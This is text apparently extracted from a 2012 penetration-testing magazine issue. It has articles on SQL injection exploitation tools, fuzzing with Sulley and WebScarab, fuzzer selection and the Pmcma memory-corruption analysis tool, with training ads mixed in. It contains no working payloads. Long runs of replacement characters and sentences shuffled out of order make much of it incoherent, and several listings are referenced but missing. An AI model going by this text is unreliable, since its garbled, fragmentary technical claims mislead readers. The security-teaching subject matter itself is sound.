be saved into a CSV file so the reports can be included as penetration evidence as part of a presentation or proof of concept. In this article.SQL INJECTION NTO SQL Invader SQL Injection is an attack in which the attacker manipulates input parameters that directly affect an SQL statement. It gives the ability to quickly and easily exploit or demonstrate SQL injection vulnerabilities in Web applications. He/she can then control how much information is gathered. NTO SQL Invader provides the data in an organised manner that is useful for executive meetings as well as technical analysis and remediation. It has been designed to assist a penetration tester in demonstrating the impact of SQL injection vulnerability in a web application penetration test.com. NTO SQL Invader is available from: ntobjectives. Exploit KB Vulnerable Web App main page 01/2012 Page 128 http://pentestmag. With a few simple clicks. the following screen will be displayed: Figure 1. NTO SQL Invader main screen Figure 2. N • TO SQL Invader is a SQL injection exploitation tool. This usually occurs when no input sanitisation is conducted. NTO SQL Invader has the following features: Easy to use – The graphic user interface of the tool enables a penetration tester to simply paste an injectable request found by a web application vulnerability scanner or feed a detailed request straight from a web application scan report. the author will show you how to exploit SQL injection vulnerability using NTO SQL invader. • • Clearly presents evidence – Unlike other SQL injectors that provide all data via command line. tables and user accounts of the back-end database. Depending on permissions. a penetration tester will be able to exploit a vulnerability to view the list of records. Global���������������� Management Recruitment ������������������������������������������������������������������� ������������������������������������������������������������������������������������������������������������ ����������������������������������������������������������������������������������������� ��������������������������������������������� ��������������������������������������������������������������������������������� ����������Permanent ������������������������������������������������������������������������������������������������������������� ���������������������������������������������������������������������������������������������������������� ����������������������������������������� ����� � ��������������������������������������������������������������������������������������������������������� ����������������� ����� � ����������������������������������������������������������������������������������������� ����� � ���������������������������������������� ����� ���������������������������������������������������������� ����� � ������������������������������������������������������������������ ����� ��������������������������������������������������������������������������������������������� ����� � ��������������������������������������������� ����� �������������������������������������� ����� � ������������������������� ����������� ����� ������������������� ����� ����������������������������������� ����� ������������������������������������������ ����������������������������������������������������������������������������������������������������������������������������������������� ���������������������������������������������������������� ���������������������������������������������������������������������������� �������������������� �������������������������������������������������������������������������������������������������������������������� ��������������������������������������������������������������������������������������������������������� ���������������� ����� ��������������������������������������������������������������������������������������������������������������� ������������ ����� ������������������������������������������������������������������������������������������������������������ ������������ ����� � �������������������������������������������������������������������������������������������������������������� ������������� ����� ������������������������������������������������������������������������������������������������������������� ��������������������������� ����� ������������������������������������������������������������������������������������� ����� � ������������������������������������������������������������������������������������������������� ������������� ����� � ����������������������������������������������������������������������������������������������������������� �������������� ����� ��������������������������������������������������������������������������������������������������������� ����� ���������������������������������������������������������������������������������������������� ����� � ������������������������������������������������������������������������ ������������������������������������������������������������������������������������������������������������������������������������������������� �������������������� �������������������������� �������������� �������������� ���������� ������������������� ��� ��������������������� ������ ����������������� ���������������� ����������������������� . Figure 3. Netsparker community edition scan results Figure 4. Netsparker community edition successfully obtained the version of back-end database Figure 1.com . This usually occurs when no input sanitisation is conducted. which can detect and report potential website security problems and allow you to resolve them before they are used by hackers. SQL Injection Tools for Windows Netsparker community edition is a powerful web application vulnerability scanner. Netsparker community edition main screen Figure 2. the author will show you how to perform SQL injection pen-testing using open source and free tools available for Windows and Linux. an attacker may be able to read database contents or even write to the database. Depending on permissions. Havij free version main screen 01/2012 Page 132 http://pentestmag. I n this article.SQL INJECTION SQL Injection PenTesting using Open Source and Free Tools SQL Injection is an attack in which the attacker manipulates input parameters which directly affect an SQL statement. ������������ ������� ����������������������������������������������������� ���������������������������������������������������� �������������������������������������������������� ��������������������������������� ��������������������������������������������������� ��������������������������������������������������������� ������������ ���������������������������������������������������� ������������������������������������������������������ ����������������������������� ������������� ��������������� �������������������������������������� ������������������������ . Through SQL Injection. the attacker may input specifically crafted SQL commands with the intent of bypassing the login form authentication mechanism. e-commerce checkout systems. the legitimate user should be granted the appropriate access for their account to the web application. The attack tries to convince the application to run SQL code that will result in access that was not intended by the application developers. When the legitimate user submits their information.com Page 142 . Data such as: User credentials. a SQL query is generated from this information and submitted to the database for verification. suppliers. PII. and anything other data that a legitimate user may need access to through a web portal. Many of these features users take for granted and demand in modern websites to provide businesses with the ability to communicate customers. SQL Injection is the attack technique which attempts to pass SQL commands through a web application for execution by the backend database. D atabases are the backbone of most commercial websites on the internet today. confidential company information. Backend databases contain lots of juicy information that an attacker may be interested in. If not sanitized properly. A Simple SQL Injection Example Take a simple login page where a legitimate user would enter his username and password combination to enter a secure area to view his personal details or upload his comments in a forum. employees. The attacker uses SQL queries and creativity to bypass typical controls that have been put in place. and business partners).SQL INJECTION SQL Injection Inject Your Way to Success SQL Injection is one of the many web attack mechanisms used by hackers to steal data from organizations. The web application in question that controls authentication will communicate with the backend database through a series of commands to verify the username and password combination that was submitted. PII. 01/2012 a myriad of user submit able forms and the delivery of dynamic web content. Common web application features introduce the SQL injection attack vector. These website features are may be susceptible to SQL Injection attacks and are good place to start during a pentest engagement that includes a web application testing component. web applications may result in SQL Injection attacks that allow hackers to view or modify information from the database. search pages. This is only possible if the inputs are not properly http://pentestmag. Once verified. These features include login pages. At its most basic form. It is (as of the time of writing) ranked as the top web application security risk by OWASP [1]. web applications allow legitimate website visitors to submit and retrieve data over the Internet using nothing more than a web browser which allow the internet to be the giant consumer market that it is. SQL Injection is one of the most common vulnerabilities in web applications today. They store the data that is delivered to website visitors (including customers. please apply with a resume to
[email protected]. nationally and internationally.au . If you are an experienced security consultant with a thorough understanding of Networking.au and quote reference PTM-TS-12. Since our inception in 2002.com. We thrive on team work. Operation Systems and Application Security. service excellence and leadership through research and innovation. our company has performed tremendously well. Protection and Sense of Security Sense of Security is an Australian based information security and risk management consulting practice. We are seeking talented people to join our team.au www.Now Hiring Teamwork Innovation Quality Integrity Passion Compliance.com. From our offices in Sydney and Melbourne we deliver industry leading services and research to our clients locally.com. info@senseofsecurity. typically the places where any attacker controlled data can enter into the system and the application starts processing it. command injections. As a QA resource. we tend to re-use most of the legacy code from the previous release and then work on the new features and bug-fixes only. network sockets. Some of us think that the researcher actually reversed engineered the code to find this issue. the general interest in identifying network. we would be using the same “conformance test suite” or the same “stress test suite” to ensure that the new builds are working as expected. we would talk about a few open source tools which are used by security researchers to spot vulnerabilities in our products even if they have zero or a very minimal knowledge of the product. etc. the money you get it quite decent. it can never be detected by a fuzzer. The entry points for user controlled or tainted data is identified in the application. or he has access to some very specialized hardware and software to spot these issues. Another class of vulnerability is design level vulnerability. you get paid anything from 5000 USD to 40000 USD depending on the width of deployment of the product targeted and the severity of the issue. format string vulnerability. fuzzers are intended to target implementation level flaws only. In the industry. dll. Fuzzers typically have a stored dictionary of strings and integers which it uses at appropriate places iteratively.FUZZING Fuzzing for Free State of Art and Upcoming Research As a developer working on a product release. we either have implementation for http://pentestmag. in this article. the motivation to work in security research has gone exponentially high in the last few years. files and activeX controls. activex controls. by definition. Hence. xss injections. Here. it would try all possible values of strings from its dictionary and further mutations of these strings. registry entries. All of these can be grouped as implementation level flaws only. Hence. Fuzzing is one of the most commonly used techniques for identifying security flaws in any application. sql injection. as some of us prefer to call them) sends an email to your security response team telling about an exploitable buffer overflow in your product. In this article. emails. Hence. If there is a design flaw in a network protocol which allows for a man-in-the-middle attack. if you disclose an exploitable vulnerability to ZDI with its proof of concept (PoC). These are files. These strings typically target standard vulnerability classes like buffer overflow. The reality is far more simple and costeffective. if you can compromise a machine by exploiting some product on it from the network. B ut what troubles us the most is that some security researcher (or hacker. file and web based vulnerabilities is consistently growing amongst the 01/2012 researchers. Network Fuzzers One commonly targeted attack surface is network protocols. we would discuss some state of the art open source tools which can be used for fuzzing networks. The model of payment by ZDI and many similar companies is that. etc. Introduction With companies like ZDI out there in the market to pay for every vulnerability you find. directory traversal.com Page 150 . If the fuzzer identifies some part of the input as a variable string. Sulley Fuzzing Framework Sulley is an Open Source project. while other components of the framework are monitoring all processes and network events related with each test. you can find your own 0-day vulnerabilities! In this article we are going to describe how we can use Sulley Fuzzing Framework with a real vulnerable FTP Server. in order to produce errors in normal software operation. but also can be used by security staff or software deverlopers. Check it. Since a software error is usually a potential security threat. F uzzing is a technique used in software security testing in which lots and lots of abnormal input data are sent to the software. Sulley Framework stores all data related to the crash.. and then the framework generates a complete set of tests based on mutations of the given grammar. using a simple grammar.. and. It can be very useful in order to understand the weakness and correct (or exploit) it. the protocol to fuzz. Sulley provides the tester with a.com . When an abnormal response happens. written in Python. powerful framework where he can describe.FUZZING Fuzzing with Sulley Can you write a simple python script? Can you understand a network protocol and describe it using a simple object set? If so. try it on your own software. Each test of this set is checked against the fuzzed software. network. Sulley from Monsters Inc. of course. Fuzzing is usually used by attackers in order to discover unknown vulnerabilities.. Figure 2. enjoy. and much more. Figure 1.. so the tester has all the information regarding the CPU registers. Fuzzing is a great technique to detect security flaws. that try to be a new standard in fuzzing software. stack. Sulley Architecture 01/2012 Page 154 http://pentestmag. in order to test their software strenght against this kind of attacks. F uzzing is all about finding vulnerabilities or errors in applications. Example: Fuzzing FTP server with FTP Fuzzers.FUZZING Fuzzing with WebScarab Although there are ample techniques to identify vulnerabilities in software. Fuzzing along with penetration testing covers this gap and discovers unknown vulnerabilities. Fuzzing is one of the techniques for automating security assessment. called fuzz. fuzzing is the best technique as it is cost effective and enhances software security as it often finds odd lapses and vulnerabilities through automated or semi-automated process followed by manual expert reviews. It is possible to enumerate the target which may go into an uncertain state which results in a security vulnerability. Response from the server is manually reviewed to identify vulnerabilities or errors. preferred parameters or parts of the session are altered and sent to the server or application. they discover known security issues and other low hanging fruit. but they are not as efficient as explicit fuzzing. Generic fuzzing involves lot of manual inputs from the users and only experienced users can able to use these types of tools. Generic Fuzzing Generic fuzzing involves tool analysis to identify vulnerabilities on array of protocols. A Fuzzer is a tool which successively picks a value from a fuzz template to replace user-specified parameters in a request sent to the server. operating systems and networks by injecting large amount of arbitrary data. it is possible that the application will go into an uncertain state which results in a security vulnerability. Fuzzing covers the vital attack surfaces in a system fairly well. There are different fuzzing methods depending on how the fuzzer is used depending on the input parameters. Explicit Fuzzing Fuzzing Overview And Requirements Fuzzing enables security engineers. errors. During fuzzing. Fuzzing is useful in evaluating black box systems. developers and testers to locate defects.com Page 158 . Since this method enables fuzzer tool to change data that already exists. identifies many common errors. Session Fuzzing Introduction To Fuzzing Why fuzzing? Where does it fit? What are its limitations? Vulnerability scanners are imprudent. and vulnerabilities produced by abnormal values via user inputs. 01/2012 Explicit fuzzing involves building of specific fuzzing tools for specific applications or servers. as it does not involve any access to source code and can be performed without knowing the inner mechanism of the target system. Example: Protocols Fuzzing Tools such as Spike http://pentestmag. Example: Incrementing session ids of a web application. probable vulnerabilities quickly and economically. Session fuzzing involves analysis of valid sessions of the application or the server. Fuzzer coverage must be measurable in two aspects: specification coverage and anomaly coverage. Software-based fuzzers are scalable in performance. Using hardware test beds: Appliance based fuzzing tools become outdated really fast. if the anomalous data causes abnormal reaction such as a crash in the target software. they almost always choose the quick and dirty solution. and can select other test completion criteria. where you can easily copy the setup to your colleagues.the same method that is used by hackers and security researchers when they look for weaknesses to exploit. or upload it to cloud setups. ��������������������� ��������������� ������������������������� ��������������������� ������������������������� ������������������������������� �������������������� ������������������������������������ ������ ��������������������������� . In this article. Test requirements should focus on coverage metrics to ensure that testing aims to find most flaws in software. but to really target the areas that are most at risk. but in QA you cannot expect that all testers understand what buffer overflows are. Be prepared for virtual setups. then you have found a critical security flaw. How to distinguish a good fuzzer. Scalable: Time is almost always an issue when it comes to testing. Sometimes you can use more time in testing. it needs to be documented for your internal developers or for vulnerability management towards third party developers. A good fuzzer will create test cases automatically. There are abundance of fuzzing tools available. and the speed requirements for the hardware increases each year. Automated: Creating fuzz test cases manually is a time-consuming and difficult task. There are no false positives. and are not locked to a physical test lab.WHAT IS A GOOD FUZZING TOOL? Fuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software. It is based on sending anomalous (invalid or unexpected) data to the test target . and can easily travel with you where testing is needed. Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks. User must also have control on the fuzzing parameters such as test coverage. what are the qualities that a fuzzing tool should have? Model-based test suites: Random fuzzing will certainly give you some results. Test coverage: Better test coverage means more discovered vulnerabilities. the test cases need to be based on actual protocol models. In QA you rarely have much time for testing. MOST COMMON MISTAKES IN FUZZING Not maintaining proprietary test scripts: Proprietary tests scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported. This is almost always random fuzzing. Remediation: All found issues must be reproduced in order to fix them. automated documentation is the only possible solution. we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing. Unprepared for cloud: A fixed location for fuzz-testing makes it hard for people to collaborate and scale the tests. When there are billions of test cases. Network recording (PCAP) and automated reproduction packages help you in delivering the exact test setup to the developers so that they can start developing a fix to the found issues. so that testers only need the domain expertise from the target system to execute tests. and therefore need to run tests fast. This results in huge improvement in test coverage and reduction in test execution time. Fuzzing tool must come with all the security knowhow built-in. Ticking off the fuzzing check-box: If the requirement for testers is to do fuzzing. PROPERTIES OF A GOOD FUZZING TOOL Documented test cases: When a bug is found. Easy to use: Most fuzzers are built for security experts. Invalid memory dereferences in read mode used for information leakage purpose or indirect memory exploitation will also be discussed near the end of this article. fixing software seems easier..org/ under the Apache 2. we will focus on a new approach we will examine exploitability in a systematic way. the presence of security 01/2012 countermeasures such as ALSR. In fact.MEMORY CORRUPTION Introduction to Exploit Automation With Pmcma (Part I) Earlier this year.. The following article is an introduction to Pmcma. integer overflow. Paradoxically. and practically for the vast majority of computer programs actually used nowadays. Writing exploits is hard. Determining exploitability is hard. A methodology to find all the function pointers exploitable by truncation in case of an arbitrary write subject to conditions (such as not controlling the value being dereferenced). exploit writing automation is desirable. Our goal is to help exploit (semi)automation by building exploitation models based on constraints gathered from the environment. or any other corruption bug) because of the special role they play in modern exploitation. they are two sides of the same coin. A methodology to discover all the function pointers actually dereferenced by a process from a given point in time. The main contributions of this Pmcma are: • • • A methodology to discover all the potential function pointers inside the address space of a process at any given point in time. hardware[4] enhancements. A methodology to find all the unaligned memory reads from a given point in time during the execution of a process. D etermining exploitability is hard. maybe because virtually all the debugging tools available focus on what is happening before a memory corruption. writing exploits is hard. The tool is available free and open-source at http:// www.0 license. Not too surprisingly. For these reasons. Proving unexploitability is provably unfeasible in the general case.com • Page 172 . In particular. focusing on what happens in memory after the bug is triggered. Determining exploitability and writing exploits is a difficult task. non executable memory. rather than tracing or backtracking what has happened before. Why is that? Well.. Public knowledge.. given a fix set of input data. common sense. for instance due to a missing format string. We will primarily focus on invalid memory write bugs (such as invalid dereference of pointers during a write operation. In addition advanced readers can refer to the full Blackhat whitepaper mirrored on the Pmcma website [0]. http://pentestmag. In this paper. due to theoretical limitations hopefully known to the reader of this paper (aka: halting point problem). rather than on what happens from there.pmcma. we released a tool called Pmcma (Post Memory Corruption Memory Analysis) at the Blackhat US security conference. So what you can get at best is a it’s not doable given the state of the art of exploitation. and compiler enhancements such as Data Hardening allow for their practical testing in order to (in)validate them. it is also quite hard. org .secureninja.secureninja. Welcome Military – Veterans Benefits & GI Bill Post 9/11 Approved WIA (Workforce Investment Act) Approved www. 2012 – Call 703-535-8600 and mention code: PentestNinja to secure your special rate.1 • CAP (Certified Authorization Professional) • CISA • CISM • CCNA Security • CWNA • CWSP • DIACAP • ECSA / LPT Dual Certification • ECSP (Certified Secure Programmer) • EDRP (Disaster Recovery Professional) • CCE (Computer Forensics) • CCNA Security • CHFI • ISSEP • Cloud Security • Digital Mobile Forensics • SSCP • Security+ • Security Awareness Training … And more Forging IT Security Experts Expert IT Security Training & Services Free Hotel Offer on Select Boot Camps Offers ends on Jan 31.com 703 535 8600 Sign Up & Get Free Quiz Engine From cccure.com • Security+ • CISSP® • CEH (Professional Hacking) v7. ME10 4EW .co. Si�ngbourne.uk support@itonlinelearning. From the CompTIA Security+ through to CISSP.co. Kent. Cer�fied Hacking Forensic Inves�gator (CHFI) and Security Analyst/Licensed Penetra�on tester (ECSA/LPT).ITOnlinelearning offers Network Security courses for the beginner through to the professional. Cer�fied Ethical Hacker (CEH). Tailored Advice and Discounts 0800-160-1161 or Please Call one of our Course Advisors for help and Tailored Advice -during office hours (Mon-Fri 9am-5.uk Registered Office: 16 Rose Walk.30pm) Telephone: 0800-160-1161 Interna�onal: +44 1795 436969 Email: sales@itonlinelearning. hence limiting false positives. The tool is available free and open-source at http:// www. This was anticipated. The following article is an introduction to Pmcma. So using the strict mode. They may just happen to be variables to luckily point to a valid function’s entry point. in such a case. how do we find function pointers? Well. we found 0 potential function pointer to overwrite: Fortunately. which points to a function. Two things are worth mentioning: first of. Let’s see how this would work inside pmcma on a simple example. and an other (either the process exit.c implementation. To detect those.MEMORY CORRUPTION Introduction to Exploit Automation With Pmcma (Part II) Earlier this year. and is quite remarkable. To the best of my knowledge. In addition advanced readers can refer to the full Blackhat whitepaper mirrored on the Pmcma website [0]. or the return to this very same instruction in case of loops).786312] su[20879]: segfault at f1f2f3f4 ip f1f2f3f4 sp bfcab4e8 error 15 jonathan@blackbox:~$ Page 184 http://pentestmag. and pmcma allows to test all of the pointers to +X zones pointing to a valid assembly instruction just by passing it the –relaxed flag.0 license. let’s get back to the definition of a function pointer. by listing the function pointers from a given point in /bin/su: see Listing 3. focusing on attacking function pointers. And they all are in executable sections. an invalid 01/2012 write condition). hence in a writable section.. because some functions may not start with a standard prologue. say. It is a variable. So what we do (in pseudo code) is: see Listing 1. we’re going to use the mk_fork() technique. We found 5 function pointers that are actually being dereferenced by /bin/su before exiting. detecting unaligned memory accesses and finally automating analysis and exploitation scenarios. More importantly. Secondly.pmcma. it doesn’t give us the list of function pointers actually being dereferenced between a given point in time (eg: the one where we found.org/ under the Apache 2.com . This is very time saving and works well in practice though. Attacking Function Pointers Now that we have a way to experiment on various modifications of a given process’ and address space. the list of pointers we get this way (by a pure static analysis) is w list of _ potential_ function pointers. The majority of times a function starts with a standard epilogue.. simulating arbitrary reads. we can read the message logs from the kernel: jonathan@blackbox:~$ dmesg |tail -n 1 [ 7472. T he second part of the article describes pmcma. we may miss a few pointers if we use this algorithm. which is obviously never correct from userland. This value can be changed from the command line. To verify we actually got something relevant. pmcma uses the valid 0xf1f2f3f4 as a remarkable value. The algorithm is as follows: see Listing 2. we released a tool called Pmcma (Post Memory Corruption Memory Analysis) at the Blackhat US security conference. By default. this is the first proposed technique to exhaustively enumerate all the function pointers inside a process between two points in time. the application will then try the relaxed mode: see Listing 4. ����������������������������������������������������� ����������������������������������������������� �������������������������������������������������� ���������������� ���������������������� ������������������ �������������������������������������������������������������� . BOSON INSTRUCTOR'S PERSPECTIVE BETWEEN CPTEngineer & CEH ������������������������������������������������� ������������������������������������������������ �������������������������������������������������� ������������������������������������������������������� ����������������������������������������������������������� ������������������������������������������������ �������������������������������������������������������� ������������������������������������������������������ ��������������������������������������������������������� �������������������������������������������������������� �������������������������������������������������������� ����������������������������������������������������� ������������������������������������������������� ���������������������������������������������������� �������������������������������������������������� ����������������������������������������������������� �������������������������������������������������� ������������������������������������������������������� ������������������������������������������������������ ������������������������������������������������������ ���������������������������������������������������� �������������������������������������������������� ������������������������� ������������������������������������������������������ ������������������������������������������������������ ������������������������������������������������������ ���������������������������������������������������� ���������������������������������������������������� ������������������������������������������������ ������������������������������������������������������ ������������������������������������������������� ������������������������������� �������������������������������������������������� ���������������������������������������������� ��������������������������������������������������� ������������������������������������������������� ��������������������������������������������������� ������������������������������������������������������ ���������������������������������������������������������� ��������������������������������������������������������� ��������������������������������������������������������� ������������������������������������������������������ �������������������������������������������������� ��������������������������������������������������� ������������������������������������������������������ �������������������������������������������������������� ��������������������������������������������������������� ����������������������������������������������������� ���������������������������������������������������� ����������������������������������������������������� ����������������������������������������������������� ����������������������������������������������������� �������������������������������������������������� �������������������������� �������������������������������������������������� ������������������������������������������������� ������������������������������������������������������� ���������������������������������������������������� ������������������������������������������������������ ������������������������������������������������� ������������������������������������������������������� ����������������������������������������������������� ���������������������������������������������������� ������������������������������������������������� �������������������������������������������������� ���������������������������������������������������������� ���������������������������������������������������� ������� ������������������������������������������������������� ������������������������������������������������������ ������������������������������������������������������� ������������������������������������������������������ ���������������������������������������������������������� ����������������������������������������������������� ���������������������������������������������������� ����������������������������������������������������������� �������������������������������������������������������� ���������������������� ����������������� ����������������������� ������������� �������������������������� ��������������������� ������������������������� �������������� ������������ ������������ �������������� ������������� ������������������������������������������������������������������������������������������������������������������������� . ����������������������������������������������������� ������������������������������������������������������� ����������������������������������������������� ������������������������������������������������ ��������������������������� ������������������������� ����������������������� ����������������������� ��������������������� ����������������������� �������������������� ����������������������� �������������������� ���������������������� �������������������������� �������������������������� ���������������������� ������������������������ ����������������������� ��������������������� ������������������������� �������������������������� ��������������������������������������������������� ������������������������������������������������������ ���������������������������������������������������� ����������������������������������������������������� ��������������������������������������������������� ������������������������������������������������������� ����������������������������������������������� ���������������������������������������������������� ����������������������������������������������������� ������������������������������������������������������ ��������������������������������������������������������� �������������������������������������������������� ����������������������������������������������������� ��������������������������������������������������� ��������������������������������������������� ��������������������������������������������������� ��������������������������������������������������������� ��������������������������������������������������������� ������������������������������������������������������ ������������������������������������������������������ ��������� ABOUT BOSON SOFTWARE. LLC ���������������������������������������������������� �������������������������������������������������� ������������������������������������������������������ ���������������������������������������������������� ������������������������������������������������������� ��������������������������������������������������� ��������������������������������������������������������� ������������������������������������������������� ������������������������������������������������ ��������������������������������������������������������� ���������������������������������������������������� �������������������������������������������������� ����������������������������������������������� ������������������������������������������������������� ������������������������������������������������ ������������������������������������������������������ ABOUT MILE2 �������������������������������������������������������� ������������������������������������������������ ���������������������������������������������������� ������������������������������������������������������� ������������������������������������������������������� ��������������������������������������������������� ��������������������������������������������������� ����������������������������������������������������� ��������������������������������������� ���������������������������������������������������� ���������������������������������������������������� ����������������������������������������������� �������������������������������������������������������� ����������������������������������������������������� ����������������������������������������������������� �������������������������������������������������� �������������������������������������������������� ������������������������������������������������������ ��������������������������������������������������� �������������������������������������������� ������������ ������������ �������������� ������������� ������������������������������������������������������������������������������������������������������������������������� .